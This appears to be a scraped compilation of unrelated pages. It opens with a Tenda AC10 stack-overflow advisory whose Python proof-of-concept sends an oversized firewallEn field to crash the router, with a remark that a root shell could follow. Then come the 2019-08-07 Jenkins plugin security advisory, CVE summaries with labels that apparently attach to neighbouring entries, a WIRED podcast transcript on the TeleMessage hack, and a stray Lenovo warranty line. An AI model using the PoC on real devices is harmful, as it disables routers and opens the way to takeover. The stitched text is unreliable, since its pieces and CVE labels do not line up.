Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetFirewallCfg, firewall\_value is controllable and will be copied to firewall\_buf by strcpy. It is worth noting that there is no size check, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'firewallEn=' + p1

p3 \= b"POST /goform/SetFirewallCfg" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42167: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A session fixation vulnerability in Jenkins Gitlab Authentication Plugin 1.4 and earlier in GitLabSecurityRealm.java allows unauthorized attackers to impersonate another user if they can control the pre-authentication session.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   Configuration as Code Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   JClouds Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

**Descriptions****Configuration as Code Plugin failed to mask secrets in system log messages**

**SECURITY-1497 / CVE-2019-10367**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked (i.e. replaced with asterisks) in that log to prevent accidental disclosure. Configuration as Code Plugin inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of log message masking. This was implemented in the fix for SECURITY-1279 in the 2019-07-31 security advisory.

That fix was incomplete and did not cover a log message written to the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator.

Configuration as Code Plugin now uses the same secret detection for these log messages.

As a workaround, administrators can configure the logging level of the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator to a level that does not include these messages. Configuration as Code Plugin 1.25 and earlier logs these messages at the INFO level, Configuration as Code Plugin 1.26 logs them at FINE. See the logging documentation for details.

**CSRF vulnerability and missing permission check in JClouds Plugin allowed capturing credentials**

**SECURITY-1482 / CVE-2019-10368 (CSRF), CVE-2019-10369 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: jclouds-jenkins**  
**Description:**

JClouds Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer permission.

**Mask Passwords Plugin shows plain text passwords in global configuration form fields**

**SECURITY-157 / CVE-2019-10370**  
**Severity (CVSS):** Low  
**Affected plugin: mask-passwords**  
**Description:**

Mask Passwords Plugin allows specifying passwords to be provided to builds in the global Jenkins configuration.

While the passwords are stored encrypted on disk, they are transmitted in plain text as part of the configuration form. This can result in exposure of the password through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**HTTP session fixation vulnerability in GitLab Authentication Plugin**

**SECURITY-795 / CVE-2019-10371**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin does not invalidate the previous session and create a new one upon successful login. This allows attackers able to control or obtain another user’s pre-login session ID to impersonate them.

As of publication of this advisory, there is no fix.

**Open redirect vulnerability in GitLab Authentication Plugin**

**SECURITY-796 / CVE-2019-10372**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin records the HTTP Referer header when the authentication process starts and redirects users to that URL when the user has finished logging in.

This implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Build Pipeline Plugin**

**SECURITY-879 / CVE-2019-10373**  
**Severity (CVSS):** Medium  
**Affected plugin: build-pipeline-plugin**  
**Description:**

Build Pipeline Plugin does not properly escape variables in views, resulting in a stored cross-site scripting vulnerability exploitable by users with permission to configure build pipelines.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in PegDown Formatter Plugin**

**SECURITY-142 / CVE-2019-10374**  
**Severity (CVSS):** Medium  
**Affected plugin: pegdown-formatter**  
**Description:**

PegDown Formatter Plugin uses the PegDown library to implement support for rendering Markdown formatted descriptions in Jenkins. It advertises disabling of HTML to prevent cross-site scripting (XSS) as a feature.

PegDown Formatter Plugin does not prevent the use of javascript: scheme in URLs for links. This results in an XSS vulnerability exploitable by users able to configure entities with descriptions or similar properties that are rendered by the configured markup formatter.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in File System SCM Plugin**

**SECURITY-569 / CVE-2019-10375**  
**Severity (CVSS):** Medium  
**Affected plugin: filesystem_scm**  
**Description:**

File System SCM Plugin allows users able to configure jobs to read arbitrary files from the Jenkins controller, even if the job is running on an agent.

As of publication of this advisory, there is no fix.

**Reflected XSS vulnerability in Wall Display Master Project Plugin**

**SECURITY-751 / CVE-2019-10376**  
**Severity (CVSS):** Medium  
**Affected plugin: jenkinswalldisplay**  
**Description:**

Wall Display Master Project Plugin does not properly escape the customTheme query parameter, resulting in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**Avatar Plugin allows changing other users' avatars**

**SECURITY-1099 / CVE-2019-10377**  
**Severity (CVSS):** Medium  
**Affected plugin: avatar**  
**Description:**

Avatar Plugin does not implement a permission check for the HTTP URL used to replace user avatars. This allows any user with Overall/Read permission to change any other user’s avatar, in addition to their own.

As of publication of this advisory, there is no fix.

**TestLink Plugin stores credentials in plain text**

**SECURITY-1428 / CVE-2019-10378**  
**Severity (CVSS):** Low  
**Affected plugin: testlink**  
**Description:**

TestLink Plugin stores credentials unencrypted in its global configuration file hudson.plugins.testlink.TestLinkBuilder.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Google Cloud Messaging Notification Plugin stores credentials in plain text**

**SECURITY-591 / CVE-2019-10379**  
**Severity (CVSS):** Low  
**Affected plugin: gcm-notification**  
**Description:**

Google Cloud Messaging Notification Plugin stores an API key unencrypted in its global configuration file org.jenkinsci.plugins.gcm.im.GcmPublisher.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Script sandbox bypass vulnerability in Simple Travis Pipeline Runner Plugin**

**SECURITY-922 / CVE-2019-10380**  
**Severity (CVSS):** High  
**Affected plugin: simple-travis-runner**  
**Description:**

Simple Travis Pipeline Runner Plugin defines a custom list of pre-approved signatures for scripts protected by the Script Security sandbox.

This custom list of pre-approved signatures allows the use of methods that can be used to bypass Script Security sandbox protection. This results in arbitrary code execution on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.

**Codefresh Integration Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-931 / CVE-2019-10381**  
**Severity (CVSS):** Medium  
**Affected plugin: codefresh**  
**Description:**

Codefresh Integration Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**VMware Lab Manager Slaves Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-1376 / CVE-2019-10382**  
**Severity (CVSS):** Medium  
**Affected plugin: labmanager**  
**Description:**

VMware Lab Manager Slaves Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**eggplant-plugin Plugin stores credentials in plain text**

**SECURITY-1430 / CVE-2019-10385**  
**Severity (CVSS):** Medium  
**Affected plugin: eggplant-plugin**  
**Description:**

eggplant-plugin Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in XL TestView Plugin allow capturing credentials**

**SECURITY-1008 / CVE-2019-10386 (CSRF), CVE-2019-10387 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: xltestview-plugin**  
**Description:**

XL TestView Plugin does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in Relution Enterprise Appstore Publisher Plugin allow SSRF**

**SECURITY-1053 / CVE-2019-10388 (CSRF), CVE-2019-10389 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: relution-publisher**  
**Description:**

A missing permission check in a form validation method in Relution Enterprise Appstore Publisher Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified URL using attacker-specified credentials and attacker-specified HTTP proxy configuration.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-142: Medium
*   SECURITY-157: Low
*   SECURITY-569: Medium
*   SECURITY-591: Low
*   SECURITY-751: Medium
*   SECURITY-795: Medium
*   SECURITY-796: Medium
*   SECURITY-879: Medium
*   SECURITY-922: High
*   SECURITY-931: Medium
*   SECURITY-1008: Medium
*   SECURITY-1053: Medium
*   SECURITY-1099: Medium
*   SECURITY-1376: Medium
*   SECURITY-1428: Low
*   SECURITY-1430: Medium
*   SECURITY-1482: Medium
*   SECURITY-1497: Medium

**Affected Versions**

*   **Avatar Plugin** up to and including 1.2
*   **Build Pipeline Plugin** up to and including 1.5.8
*   **Codefresh Integration Plugin** up to and including 1.8
*   **Configuration as Code Plugin** up to and including 1.26
*   **eggplant-plugin Plugin** up to and including 2.2
*   **File System SCM Plugin** up to and including 2.1
*   **Google Cloud Messaging Notification Plugin** up to and including 1.0
*   **GitLab Authentication Plugin** up to and including 1.4
*   **JClouds Plugin** up to and including 2.14
*   **Mask Passwords Plugin** up to and including 2.12.0
*   **PegDown Formatter Plugin** up to and including 1.3
*   **Relution Enterprise Appstore Publisher Plugin** up to and including 1.24
*   **Simple Travis Pipeline Runner Plugin** up to and including 1.0
*   **TestLink Plugin** up to and including 3.16
*   **VMware Lab Manager Slaves Plugin** up to and including 0.2.8
*   **Wall Display Master Project Plugin** up to and including 0.6.34
*   **XL TestView Plugin** up to and including 1.2.0

**Fix**

*   **Configuration as Code Plugin** should be updated to version 1.27
*   **JClouds Plugin** should be updated to version 2.15

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-879, SECURITY-931, SECURITY-1053, SECURITY-1376
*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1428, SECURITY-1430
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-922
*   **MWR labs (@mwrlabs)** for SECURITY-751
*   **Matthias Schmalz, SAP SE** for SECURITY-157
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1008, SECURITY-1099
*   **Oleg Nenashev, CloudBees, Inc., and, independently, Viktor Gazdag NCC Group** for SECURITY-1482
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-795, SECURITY-796

CVE-2019-10371: Jenkins Security Advisory 2019-08-07

An open redirect vulnerability in Jenkins Gitlab Authentication Plugin 1.4 and earlier in GitLabSecurityRealm.java allows attackers to redirect users to a URL outside Jenkins after successful login.

CVE-2019-10372: Jenkins Security Advisory 2019-08-07

A stored cross-site scripting vulnerability in Jenkins PegDown Formatter Plugin 1.3 and earlier allows attackers able to edit descriptions and other fields rendered using the configured markup formatter to insert links with the javascript scheme into the Jenkins UI.

CVE-2019-10374: Jenkins Security Advisory 2019-08-07

A stored cross-site scripting vulnerability in Jenkins Build Pipeline Plugin 1.5.8 and earlier allows attackers able to edit the build pipeline description to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.

CVE-2019-10373: Jenkins Security Advisory 2019-08-07

Due to an incomplete fix of CVE-2019-10343, Jenkins Configuration as Code Plugin 1.26 and earlier did not properly apply masking to some values expected to be hidden when logging the configuration being applied.

CVE-2019-10367: Jenkins Security Advisory 2019-08-07

A reflected cross-site scripting vulnerability in Jenkins Wall Display Plugin 0.6.34 and earlier allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.

CVE-2019-10376: Jenkins Security Advisory 2019-08-07

Jenkins VMware Lab Manager Slaves Plugin 0.2.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10382: Jenkins Security Advisory 2019-08-07

Jenkins Codefresh Integration Plugin 1.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10381: Jenkins Security Advisory 2019-08-07

In the wake of SignalGate, a knockoff version of Signal used by a high-ranking member of the Trump administration was hacked. Today on Uncanny Valley, we discuss the platforms used for government communications.

All products featured on WIRED are independently selected by our editors. However, we may receive compensation from retailers and/or from purchases of products through these links.

When former national security adviser Mike Waltz had a picture taken of him last week, he didn’t expect for the whole world to see that he was using TeleMessage, a messaging app similar to Signal. Now the app has been hacked, with portions of data linked to government entities like Customs and Border Protection (CBP) and companies like Coinbase. Today on the show, we’re joined by WIRED senior writer Lily Hay Newman to discuss what this incident tells us about the growing vulnerabilities in government communications.

Articles mentioned in this episode:  
**Mike Waltz Has Somehow Gotten Even Worse at Using Signal**, by Lily Hay Newman  
**The Signal Clone the Trump Admin Uses Was Hacked** , by Joseph Cox and Micah Lee  
**The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats**, by Lily Hay Newman

You can follow Zoë Schiffer on Bluesky at @zoeschiffer and Lily Hay Newman on Bluesky at @lhn. Write to us at uncannyvalley@wired.com.

**How to Listen**

You can always listen to this week's podcast through the audio player on this page, but if you want to subscribe for free to get every episode, here’s how:

If you're on an iPhone or iPad, open the app called Podcasts, or just tap this link. You can also download an app like Overcast or Pocket Casts and search for “Uncanny Valley.” We’re on Spotify too.

**Transcript**

_Note: This is an automated transcript, which may contain errors._

**Zoë Schiffer:** Hi, this is Zoë. Before we start, I want to take the chance to remind you that we want to hear from you. If you have tech-related questions that have been on your mind or a topic that you wish we'd cover, write to us at uncannyvalley@WIRED.com. And if you listen to and enjoy the show, please rate it and leave a review on your podcast app of choice. It really honestly makes a difference. Welcome to WIRED's _Uncanny Valley_. I'm WIRED's director of business and industry, Zoë Schiffer. Today on the show, the hacking scandal surrounding TeleMessage, the knockoff version of Signal, which is used by at least one high-ranking member of the Trump administration. The app has temporarily suspended its services while it investigates the incident. We're going to talk about how former national security adviser Mike Waltz was seen last week using the app in a cabinet meeting and what this latest incident tells us about the growing vulnerabilities in government communication. I'm joined by Lily Hay Newman, senior writer at WIRED. Lily, welcome to the show.

**Lily Hay Newman:** It's a pleasure to be here.

**Zoë Schiffer:** What exactly is TeleMessage?

**Lily Hay Newman:** Yeah. So TeleMessage is a company that's been around since the late ’90s. It was founded in Israel, and it creates apps that are sort of mirror images or clones of existing communication apps, and then adds in an archiving feature. So this is especially perhaps wanted for apps that are securing communications, such that it's difficult to retain copies of the messages. So if you need copies for compliance or you need a record, the idea is that these services are giving the same functionality as apps you know, like WhatsApp or Telegram or Signal, but with the addition of these archiving features.

**Zoë Schiffer:** And that's important, obviously, for people who work in government because, technically, members of the press and other people are supposed to be allowed to access a lot of the communications that aren't classified by submitting Freedom of Information Act requests. And you can't do that if the messages are disappearing.

**Lily Hay Newman:** Correct. There are record retention laws in the US and other countries for transparency and information requests, as you said. But historically, the way governments and other institutions have complied with that is by using communication platforms that are built for the purpose of government communications, tailor-built to be in compliance in a number of ways. So all of this is coming up because now the Trump administration in recent months has been sort of departing from the standard ways that officials in the US have communicated to use consumer platforms, particularly the secure messaging platform Signal, to talk to each other, but doing so in a very ad hoc consumer way like in the same way that you and I would set up a Signal conversation. That's what they've been doing, and that's where you get into this whole question of how do you comply with records requirements. How do you comply with safety requirements when you're just kind of using off-the-shelf tech in a regular way? And so that's where TeleMessage comes in.

**Zoë Schiffer:** Well, it seems like one of the people, as we mentioned earlier, who was using TeleMessage was Mike Waltz, the now former national security adviser, who at this point is best known for starting that infamous Signal group chat a few weeks back that accidentally added a senior member of The Atlantic Newsroom. How did we find out that he was using TeleMessage in the first place?

**Lily Hay Newman:** So his screen, the screen of his phone, was sort of inadvertently captured in a photo of a cabinet meeting, a Reuters photo, that Mike Waltz was participating in, was sitting at the table with Trump and a number of officials. The photo is a bit funny because it seems like he thinks no one can see him using his phone, or he is kind of checking his phone. I mean, we've all been there, looking under the conference table at our phone. But additionally, his screen shows what appears to be Signal. So we're really going, zooming in deep into this photo, right. We're looking over his shoulder at his phone. Now we're seeing this notification. And then in the notification, instead of the normal words that would be there, people noticed that the Signal … where it would normally say Signal, was being referred to as TM Signal. And that's how people realized that, actually, he was using this other app called TeleMessage.

**Zoë Schiffer:** Got it. Yeah. Nothing makes me love reporters more than the absolute psychotic behavior of zooming in on a tiny little phone screen to be like, “What exactly is going on here?” But kudos to 404 Media, because I think they were the first ones to point that out. You wrote in a recent WIRED article that Mike Waltz has inexplicably gotten even worse at using Signal. So, I guess what did you mean by that? How is he getting worse at using this end-to-end encrypted app?

**Lily Hay Newman:** This whole revelation about his use of TM Signal is building on this previous situation called Signal Gate. Mike Waltz was the person who inadvertently added Jeffrey Goldberg, the top editor of The Atlantic, to the chat. And so already Mike Waltz was not having a great track record, and then disappearing messages were on the whole time. And so, one of the many criticisms was that this was not in compliance with government record-retention laws. So we don't know this, but presumably then he started using TM Signal as a solution to that aspect of the issues raised. But I just want to be clear. We don't know. It could be that they were already using it, or he was already using TM Signal at the time. I'm not sure. But one might suspect that hearing some of this criticism, he was like, “OK, let me find a solution that does retain records and does have an archiving feature.” And that's where TeleMessage would come in.

**Zoë Schiffer:** So the national security advisoer sets up this group chat, presumably not in compliance, then switches to one that looks like it might be in compliance, and then that version is promptly hacked. Do we know at this point who is behind the hacking?

**Lily Hay Newman:** More and more is coming out about potential hacks of TeleMessage or sort of ability to intercept messages and see messages in memory. First, 404 Media and Micah Lee published a piece with an unnamed hacker providing evidence that they could breach TeleMessage. And then, on Monday, NBC News published an additional report with an additional unnamed hacker. So clearly there's a lot of insecurity here. And the criticism of TM Signal from this company, TeleMessage, is that it claims to have all the same security features as real Signal and to sort of preserve that, and just add on this archiving feature. But, definitionally, adding in the archiving feature breaks Signal security. The way signal is designed and other end-to-end encrypted apps like WhatsApp, when you add in this other party, it's virtually impossible that the security guarantees could be preserved. And then, on top of that, it seems like from source code review that's starting to come out, and research that's starting to happen, and analysis into TM Signal, that actually it's just not constructed in a very secure way at all. So, just a lot of layers to get to the point, which is that this was a wildly insecure app for Mike Waltz to be using, sitting at a table with the top cabinet members and the president of the United States. It's wild.

**Zoë Schiffer:** We're going to get into what exactly was accessed in this hack. But before we do that, we're going to take a short break.

\[_break_\]

**Zoë Schiffer:** We are back. So let's get into what exactly was accessed when it looks like multiple hackers were able to break into TM Signal, which was being used by at least one member of the Trump administration.

**Lily Hay Newman:** So far, these researchers, what they've shown is that some messages, sometimes at least, are being sent to the archiving server in plain text, meaning they are readable. That's precisely what a platform like genuine Signal is trying to avoid. And so that's what's happening. So these were sort of fragments or pieces or whole messages, but not whole conversations, things like that, so far. One thing that 404 Media reported on from these leaks was evidence that US Customs and Border Patrol agents have been using TM Signal. It's not totally clear what's going on with this. WIRED reached out to CBP. We've been trying to get clarification on what this leaked data means. There seem to be confirmed CBP phone numbers associated with these accounts that came out of this breach. CBP has told WIRED just that they're looking into it. But that's an example that is really concerning, it would potentially show that this app is in wider use across other agencies in the US government.

**Zoë Schiffer:** Is there a national security concern with the fact that this app was developed in Israel, regardless of the fact that it was acquired by a US company recently?

**Lily Hay Newman:** The thing is, even without getting into any specific geopolitics, the point of the protocols that exist for the US government to use its own purpose-built communication platforms is that any and all foreign governments conduct espionage. The US does it. Everyone does it. So, for your most sacred and sensitive national communication, you want to do that on a platform that you completely control, that you have built and vetted yourself, and just all parameters are controlled by you. You don't want to involve any other parties. So Israeli espionage groups are known for being very aggressive, very innovative, very cunning. So, for that reason, particularly, perhaps it's a concern that TeleMessage was founded in the country and has those ties. But just in general, regardless of what country it is, I think it's important conceptually to understand that it doesn't make sense to use the app in this way.

**Zoë Schiffer:** After this reporting came out, TeleMessage has paused or stopped its services. What's the status of the company right now?

**Lily Hay Newman:** Right. So clearly, they have concerns, and their parent company, Smarsh, has concerns about these findings as well. They say that they are investigating a potential breach and have employed a third-party firm to help them with that. And they've taken down all the content from the TeleMessage website and paused TeleMessage operations, essentially. So they say it's a pause and pending the investigation, but a pretty big reaction here to these findings.

**Zoë Schiffer:** That's a good place to end it. When we come back, we'll share our recommendations for what to check out on WIRED.com this week. Welcome back to _Uncanny Valley_. I'm Zoë Schiffer, WIRED's director of business and industry. I'm joined today by WIRED senior writer Lily Hay Newman. Before we take off, Lily, tell our listeners what they absolutely have to read on WIRED this week.

**Lily Hay Newman:** I'm just fascinated by this story by our colleague Caroline Haskins. US border agents are asking for help taking photos of everyone entering the country by car. And this is, we're just continuing our CBP discussions for today. CBP has apparently released a request for information seeking pitches, essentially for companies to help them do vehicle surveillance at the border and face recognition technology to see specifically who is in cars, not just the front seat. And I think it's really important for all of us to be aware of the extensive and expansive surveillance dragnet at the US border and all different types of US border crossings. The southern border of the US has long been known as sort of like a forefront of surveillance technology. And so it's dark, but interesting to hear that CBP feels like they don't yet have what they need to do this type of analysis and face recognition in cars, but that they want it, and they're trying to expand the analysis they can do on who is in every car.

**Zoë Schiffer:** Right. And it'll be interesting to see which company gets this contract. OK. Well, I wanted to flag a piece that we published yesterday by Paresh Dave and Kylie Robison. It's about OpenAI announcing that it is not, in fact, going to restructure its company to make the nonprofit arm not in control. In other words, the nonprofit arm is going to remain in control of the company. And this is a reversal of a prior announcement where it said it was going to become a public benefit corporation, likely to make fundraising easier. But after the plan was announced, the company got a ton of pushback from a variety of civic organizations and also Elon Musk, who was involved in the founding of the company before an acrimonious split in 2018. These groups don't usually agree on a lot, but they agreed on this, that becoming a for-profit company was in violation of OpenAI's founding mission. So we have a lot of good reporting on how people are taking this news and what it means for the future of the company. That's our show for today. We'll link to all the stories we spoke about in the show notes. Make sure to check out Thursday's episode of _Uncanny Valley_, which is about Trump's meme coin saga and the conflict of interest that come with it. Adriana Tapia produced this episode. Amar Lal at Macro Sound mixed this episode. Jordan Bell is our executive producer. Condé Nast's head of global audio is Chris Bannon. And Katie Drummond is WIRED's global editorial director.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us